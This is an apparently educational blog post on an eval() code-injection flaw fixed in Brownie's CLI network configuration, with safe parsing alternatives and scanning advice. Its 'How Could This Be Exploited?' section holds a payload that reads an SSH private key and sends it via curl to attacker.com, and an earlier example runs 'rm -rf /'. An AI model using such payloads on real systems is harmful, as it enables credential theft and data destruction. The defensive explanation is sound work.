Code Injection via eval(): How a Critical Python Flaw Was Fixed in Brownie
Introduction
Python's eval() function is one of those features that looks incredibly convenient on the surface — and dangerously sharp underneath. It can evaluate any Python expression passed to it as a string, which makes it feel like a superpower when you need dynamic behavior. But that same power becomes a catastrophic liability the moment untrusted data finds its way into its argument.
A recent security patch in Brownie, a popular Python-based development and testing framework for Ethereum smart contracts, addressed exactly this problem. A call to eval() in the CLI's network configuration module (brownie/_cli/networks.py) was identified by static analysis tooling (Semgrep) as a high-severity code injection risk — and for good reason.
If you write Python, especially tooling that parses configuration files, command-line arguments, or network data, this vulnerability pattern is something you need to understand.
The Vulnerability Explained
What Is eval() and Why Is It Dangerous?
Python's built-in eval() function takes a string and executes it as a Python expression:
# Simple example
result = eval("2 + 2") # Returns 4
# Dangerous example
user_input = "__import__('os').system('rm -rf /')"
result = eval(user_input) # Executes shell command!
The problem is that eval() doesn't just evaluate math or simple data structures — it evaluates any valid Python expression, including calls to __import__, os.system, subprocess, and other powerful built-ins. If an attacker can control or influence the string passed to eval(), they can execute arbitrary code with the same privileges as the running process.
Where Was This in Brownie?
The vulnerable code existed in brownie/_cli/networks.py at line 87. Brownie's CLI handles network configuration — things like adding, modifying, or listing Ethereum network endpoints. This kind of configuration often involves parsing structured data from files, environment variables, or user input.
The pattern likely looked something like this (illustrative example):
# BEFORE: Vulnerable pattern
def parse_network_config(config_string):
# Dangerous: config_string could come from an untrusted source
config = eval(config_string)
return config
At first glance, this might seem reasonable — perhaps the developer expected config_string to always be a Python dict literal like "{'host': 'localhost', 'port': 8545}". But eval() has no concept of "safe" input. It will execute whatever valid Python it receives.
How Could This Be Exploited?
Consider a scenario where a network configuration is loaded from a file, a remote source, or passed via a CLI argument:
# Attacker-controlled input
malicious_config = """
{'host': __import__('os').popen('curl http://attacker.com/steal?data=' + open('/home/user/.ssh/id_rsa').read()).read()}
"""
# This would execute the embedded command!
config = eval(malicious_config)
Attack vectors could include:
- Malicious configuration files: A developer clones a repository containing a tampered network config file
- Man-in-the-middle attacks: If config data is fetched over an insecure connection, an attacker could inject a payload
- Shared environments: In CI/CD pipelines or shared developer machines, a malicious actor could modify config files
- Supply chain attacks: A compromised dependency or template that generates network config strings
Real-World Impact
In the context of Brownie — a tool used by blockchain developers who routinely handle private keys, wallet credentials, and deployment configurations — the consequences of arbitrary code execution are severe:
- 🔑 Private key theft: Attackers could exfiltrate wallet private keys used for contract deployment
- 💸 Financial loss: Stolen keys mean stolen funds from crypto wallets
- 🏗️ Infrastructure compromise: Full shell access to CI/CD systems or developer machines
- 📦 Supply chain poisoning: Compromised developer machines can lead to backdoored smart contracts being deployed
The Fix
What Changed?
The fix removes the eval() call entirely, replacing it with a safer parsing approach. For Python dictionary-like configuration data, the correct tool is ast.literal_eval() — or better yet, a dedicated configuration format like JSON or YAML with proper parsing libraries.
Here's the conceptual before/after:
# BEFORE: Dangerous
import re
def parse_network_config(config_string):
config = eval(config_string) # ❌ Executes arbitrary Python!
return config
# AFTER: Safe
import ast
def parse_network_config(config_string):
config = ast.literal_eval(config_string) # ✅ Only parses literals
return config
Why Is ast.literal_eval() Safer?
ast.literal_eval() is Python's built-in safe alternative for evaluating string representations of Python literals. It only supports:
- Strings, bytes
- Numbers (int, float, complex)
- Tuples, lists, dicts, sets
- Booleans and
None
It explicitly rejects any expression that isn't a literal — no function calls, no imports, no attribute access. Attempting to pass malicious code raises a ValueError:
import ast
# Safe: parses a dict literal
config = ast.literal_eval("{'host': 'localhost', 'port': 8545}")
# Returns: {'host': 'localhost', 'port': 8545} ✅
# Safe failure: rejects code execution
config = ast.literal_eval("__import__('os').system('whoami')")
# Raises: ValueError: malformed node or string ✅
Even Better: Use Structured Configuration Formats
For production tooling, the gold standard is to avoid evaluating Python string expressions altogether and instead use purpose-built configuration formats:
# JSON-based config (recommended)
import json
def parse_network_config(config_string):
config = json.loads(config_string) # ✅ No code execution possible
return config
# YAML-based config (use safe_load!)
import yaml
def parse_network_config(config_file_path):
with open(config_file_path) as f:
config = yaml.safe_load(f) # ✅ safe_load prevents code execution
return config
# ⚠️ Never use yaml.load() without Loader=yaml.SafeLoader
Prevention & Best Practices
1. Never Use eval() on Untrusted Input
This is the cardinal rule. If there's any possibility that the string passed to eval() originates from outside your program — a file, network, environment variable, CLI argument, or user input — do not use eval().
Ask yourself: "Could an attacker influence what string gets passed here?" If the answer is "maybe," treat it as "yes."
2. Use ast.literal_eval() for Python Literal Parsing
When you genuinely need to parse Python-style data structures (e.g., converting a string representation of a dict to an actual dict), use ast.literal_eval(). It's in the standard library and is explicitly designed for this use case.
3. Prefer Structured Data Formats
Design your configuration and data exchange around formats like:
| Format | Library | Notes |
|---|---|---|
| JSON | json (stdlib) |
Fast, widely supported, no code execution |
| YAML | pyyaml |
Use safe_load() only — never bare load() |
| TOML | tomllib (Python 3.11+) |
Great for config files |
| INI/CFG | configparser (stdlib) |
Simple key-value configs |
4. Integrate Static Analysis in Your Pipeline
This vulnerability was caught by Semgrep, a powerful open-source static analysis tool. Rules like python.lang.security.audit.eval-detected will flag eval() usage automatically.
Add security scanning to your CI/CD pipeline:
# Example GitHub Actions step
- name: Run Semgrep
uses: returntocorp/semgrep-action@v1
with:
config: >-
p/python
p/security-audit
Other tools to consider:
- Bandit — Python-specific security linter (bandit -r your_project/)
- PyLint with security plugins
- SonarQube / SonarCloud
- CodeQL (GitHub Advanced Security)
5. Apply the Principle of Least Privilege
Even if code injection isn't possible, run your tools with minimal permissions. A compromised process with limited privileges can do far less damage than one running as root or with access to sensitive credentials.
6. Know the OWASP and CWE References
This vulnerability maps to well-known security standards:
- OWASP A03:2021 — Injection: The top injection risks, including code injection
- CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')
- CWE-94: Improper Control of Generation of Code ('Code Injection')
Familiarizing yourself with these references helps you recognize the pattern in code reviews and security audits.
Quick Reference: Safe Alternatives to eval()
# ❌ Never do this with untrusted input
result = eval(user_data)
result = exec(user_data)
# ✅ For Python literals only
import ast
result = ast.literal_eval(user_data)
# ✅ For JSON data
import json
result = json.loads(user_data)
# ✅ For YAML config files
import yaml
result = yaml.safe_load(file_handle)
# ✅ For simple key=value configs
import configparser
config = configparser.ConfigParser()
config.read('config.ini')
Conclusion
The eval() vulnerability patched in Brownie is a textbook example of a well-intentioned shortcut becoming a serious security liability. It's easy to understand why developers reach for eval() — it's concise and flexible. But in security, flexibility without constraints is a vulnerability waiting to be discovered.
The key takeaways from this fix:
eval()is not a parsing function — it's a code execution function. Treat it accordingly.ast.literal_eval()is the right tool for parsing Python literal strings safely.- Structured formats like JSON and YAML (with
safe_load) are the best long-term solution for configuration data. - Static analysis tools like Semgrep and Bandit can catch these issues before they reach production — integrate them into your workflow today.
- In blockchain development, the stakes are especially high. Credential theft or arbitrary code execution can directly translate to financial loss.
Security isn't about being paranoid — it's about building habits. Questioning where your data comes from, using safe APIs, and automating security checks are practices that compound over time into significantly more resilient software.
If you're working on Python tooling, take 30 minutes today to run Bandit or Semgrep on your codebase. You might be surprised what you find.
This vulnerability was identified and fixed through automated security scanning. Kudos to the Brownie maintainers for the swift remediation.
References:
- Python ast.literal_eval() documentation
- Semgrep Rule: eval-detected
- OWASP Top 10: A03 Injection
- CWE-95: Eval Injection
- Bandit Python Security Linter